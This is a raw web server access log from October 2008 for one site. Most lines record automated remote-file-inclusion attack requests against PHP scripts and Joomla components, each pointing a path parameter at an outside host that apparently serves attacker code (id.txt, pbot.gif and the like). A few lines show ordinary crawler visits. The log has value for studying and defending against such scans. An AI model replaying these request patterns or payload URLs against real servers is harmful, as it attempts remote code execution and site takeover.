80.190.202.150 - - [11/Oct/2008:06:21:59 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
91.205.124.12 - - [11/Oct/2008:06:22:21 -0700] "GET /?M=D HTTP/1.1" 200 779 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:22:34 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:22:37 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:22:54 -0700] "GET /poll/poll_ssi.php?include_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:22:54 -0700] "GET /poll/poll_ssi.php?include_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.205.124.12 - - [11/Oct/2008:06:23:05 -0700] "GET /?S=D HTTP/1.1" 200 779 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:23:33 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:23:34 -0700] "GET /phphtml.php?htmlclass_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
193.188.66.6 - - [11/Oct/2008:06:23:34 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.miasstorg.ru/re.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.jooty.com"
193.188.66.6 - - [11/Oct/2008:06:23:34 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.miasstorg.ru/re.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:23:34 -0700] "GET /logs/phphtml.php?htmlclass_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
193.188.66.6 - - [11/Oct/2008:06:23:35 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.miasstorg.ru/re.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:24:33 -0700] "GET /logs/?sourcedir=http://www.gothamclassifieds.com/child.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:24:33 -0700] "GET /?sourcedir=http://www.gothamclassifieds.com/child.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:24:34 -0700] "GET /logs/access.log/?sourcedir=http://www.gothamclassifieds.com/child.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:24:34 -0700] "GET /logs/access.log/?sourcedir=http://www.gothamclassifieds.com/child.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:24:34 -0700] "GET /?sourcedir=http://www.gothamclassifieds.com/child.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:24:34 -0700] "GET /logs/?sourcedir=http://www.gothamclassifieds.com/child.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:24:46 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://books.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:24:46 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://books.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:25:20 -0700] "GET /logs/access.log/?sourcedir=http://www.gothamclassifieds.com/v6-idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:25:20 -0700] "GET /?sourcedir=http://www.gothamclassifieds.com/v6-idbr.txt%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:25:21 -0700] "GET /logs/?sourcedir=http://www.gothamclassifieds.com/v6-idbr.txt%0D?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.jooty.com"
84.19.184.14 - - [11/Oct/2008:06:25:37 -0700] "GET /logs/access_080922.log/?sourcedir=http://www.t-tac.com/bbs/avatar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
84.19.184.14 - - [11/Oct/2008:06:25:38 -0700] "GET /?sourcedir=http://www.t-tac.com/bbs/avatar/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.jooty.com"
84.19.184.14 - - [11/Oct/2008:06:25:38 -0700] "GET /logs/?sourcedir=http://www.t-tac.com/bbs/avatar/id.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:25:44 -0700] "GET /?sourcedir=http://www.gothamclassifieds.com/v6-idbr.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:25:44 -0700] "GET /logs/access.log/?sourcedir=http://www.gothamclassifieds.com/v6-idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:25:44 -0700] "GET /logs/?sourcedir=http://www.gothamclassifieds.com/v6-idbr.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:26:05 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:26:05 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:26:05 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.202.67.0 - - [11/Oct/2008:06:26:27 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:26:38 -0700] "GET /include/monitoring/engine/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:26:38 -0700] "GET /include/monitoring/engine/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:26:44 -0700] "GET /include/monitoring/engine/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "jooty.com"
91.194.91.196 - - [11/Oct/2008:06:26:44 -0700] "GET /include/monitoring/engine/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "jooty.com"
200.234.200.155 - - [11/Oct/2008:06:27:06 -0700] "GET /logs/access_080920.log/phphtml.php?htmlclass_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
69.248.147.137 - - [11/Oct/2008:06:27:09 -0700] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.210.195.32 - - [11/Oct/2008:06:27:17 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.210.195.32 - - [11/Oct/2008:06:27:17 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.210.195.32 - - [11/Oct/2008:06:27:20 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
98.202.67.0 - - [11/Oct/2008:06:27:44 -0700] "GET /logs/access_080926.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:28:03 -0700] "GET /logs/access_080827.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:28:03 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:28:03 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:28:32 -0700] "GET /logs/access_080727.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:28:57 -0700] "GET /logs/access.log%20/?sourcedir=http://www.gothamclassifieds.com/child.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.114.75.233 - - [11/Oct/2008:06:29:02 -0700] "GET /logs/access_080926.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:29:07 -0700] "GET /logs/access_080914.log//include/monitoring/engine/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:29:08 -0700] "GET /logs/access_080914.log//include/monitoring/engine/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:29:08 -0700] "GET /include/monitoring/engine/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:29:08 -0700] "GET /include/monitoring/engine/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:29:08 -0700] "GET /logs//include/monitoring/engine/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:29:09 -0700] "GET /logs//include/monitoring/engine/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:29:24 -0700] "GET /logs/access.log%20/?sourcedir=http://www.gothamclassifieds.com/child.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:29:56 -0700] "GET /logs/access_080920.log/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
84.19.184.14 - - [11/Oct/2008:06:30:04 -0700] "GET /logs/access_080920.log/?sourcedir=http://www.t-tac.com/bbs/avatar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.210.195.32 - - [11/Oct/2008:06:30:20 -0700] "GET /logs/access_080926.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
193.188.66.6 - - [11/Oct/2008:06:30:34 -0700] "GET /logs/access_080923.log//include/admin.lib.inc.php?site_path=http://www.miasstorg.ru/re.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.jooty.com"
217.169.46.98 - - [11/Oct/2008:06:30:35 -0700] "GET /logs/access_080923.log/include/admin.lib.inc.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:31:22 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:31:22 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:31:22 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:31:23 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:31:23 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:31:23 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
65.55.208.64 - - [11/Oct/2008:06:31:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
65.55.208.64 - - [11/Oct/2008:06:31:36 -0700] "GET /logs/access_080925.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
65.55.208.64 - - [11/Oct/2008:06:31:37 -0700] "GET /logs/scripts.log HTTP/1.1" 200 344922 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:32:18 -0700] "GET /logs/access_080926.log//poll/poll_ssi.php?include_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:32:18 -0700] "GET /logs/access_080926.log//poll/poll_ssi.php?include_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:32:19 -0700] "GET /poll/poll_ssi.php?include_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:32:19 -0700] "GET /poll/poll_ssi.php?include_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:32:22 -0700] "GET /logs//poll/poll_ssi.php?include_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:32:22 -0700] "GET /logs//poll/poll_ssi.php?include_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
24.67.0.44 - - [11/Oct/2008:06:33:16 -0700] "GET /logs/access.log//mambots/content/multithumb/errors.php?error=http://www.jautour.net//skin_shop/standard/3_plugin_twindow/ramba_zamba.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
24.67.0.44 - - [11/Oct/2008:06:33:17 -0700] "GET /logs/access.log//mambots/content/multithumb/errors.php?error=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
24.67.0.44 - - [11/Oct/2008:06:33:17 -0700] "GET /mambots/content/multithumb/errors.php?error=http://www.jautour.net//skin_shop/standard/3_plugin_twindow/ramba_zamba.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
24.67.0.44 - - [11/Oct/2008:06:33:17 -0700] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.jautour.net//skin_shop/standard/3_plugin_twindow/ramba_zamba.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:33:18 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:33:19 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:33:19 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:33:19 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:33:19 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:33:19 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:33:25 -0700] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:33:25 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
24.67.0.44 - - [11/Oct/2008:06:33:29 -0700] "GET /logs/access_080926.log//includes/mailaccess/errors.php?error=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
24.67.0.44 - - [11/Oct/2008:06:33:30 -0700] "GET /includes/mailaccess/errors.php?error=http://www.jautour.net//skin_shop/standard/3_plugin_twindow/ramba_zamba.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
24.67.0.44 - - [11/Oct/2008:06:33:31 -0700] "GET /logs//includes/mailaccess/errors.php?error=http://www.jautour.net//skin_shop/standard/3_plugin_twindow/ramba_zamba.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:33:31 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
24.67.0.44 - - [11/Oct/2008:06:33:31 -0700] "GET /logs//includes/mailaccess/errors.php?error=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:33:33 -0700] "GET /includes/mailaccess/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:33:34 -0700] "GET /includes/mailaccess/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:33:42 -0700] "GET /mambots/content/multithumb/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:33:43 -0700] "GET /mambots/content/multithumb/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:34:12 -0700] "GET /logs/access_080822.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:34:17 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jooty.com"
80.190.202.150 - - [11/Oct/2008:06:34:20 -0700] "GET /logs/access_080925.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:34:20 -0700] "GET /logs/access_080925.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:34:25 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:34:25 -0700] "GET //vwar/backup/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.234.200.155 - - [11/Oct/2008:06:34:26 -0700] "GET /logs///vwar/backup/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
193.188.66.6 - - [11/Oct/2008:06:34:56 -0700] "GET /logs/access_080923.log//include/admin.lib.inc.php?site_path=http://www.miasstorg.ru/re.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:34:59 -0700] "GET /logs/access_080920.log//include/monitoring/engine/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:35:00 -0700] "GET /logs/access_080920.log//include/monitoring/engine/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:35:00 -0700] "GET /includes/mailaccess/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:35:00 -0700] "GET /includes/mailaccess/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:35:15 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:35:15 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:35:15 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:35:17 -0700] "GET /logs/access_080928.log//poll/poll_ssi.php?include_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:35:18 -0700] "GET /logs/access_080928.log//poll/poll_ssi.php?include_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
24.67.0.44 - - [11/Oct/2008:06:35:30 -0700] "GET /logs/access_080923.log//mambots/content/multithumb/errors.php?error=http://www.jautour.net//skin_shop/standard/3_plugin_twindow/ramba_zamba.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
24.67.0.44 - - [11/Oct/2008:06:35:31 -0700] "GET /logs/access_080923.log//mambots/content/multithumb/errors.php?error=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:35:32 -0700] "GET /logs/access_080923.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
